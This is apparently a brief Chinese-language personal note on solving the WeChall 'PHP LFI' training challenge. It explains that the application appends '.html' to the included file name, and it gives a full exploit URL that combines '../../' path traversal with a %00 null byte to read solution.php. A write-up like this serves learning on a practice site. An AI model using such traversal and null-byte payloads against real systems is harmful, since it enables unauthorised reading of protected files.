PHP LFI
坑点是后面会加一个.html
http://sp4hack.blogspot.ca/2012/10/we-chall-training-php-lfi.html
这里的思路是加一个%00
- Everything after the null byte will be deleted.
太帅了=_^
好像就是传说中的 Null Byte Injection ?
http://www.wechall.net/challenge/training/php/lfi/up/index.php?file=../../solution.php%00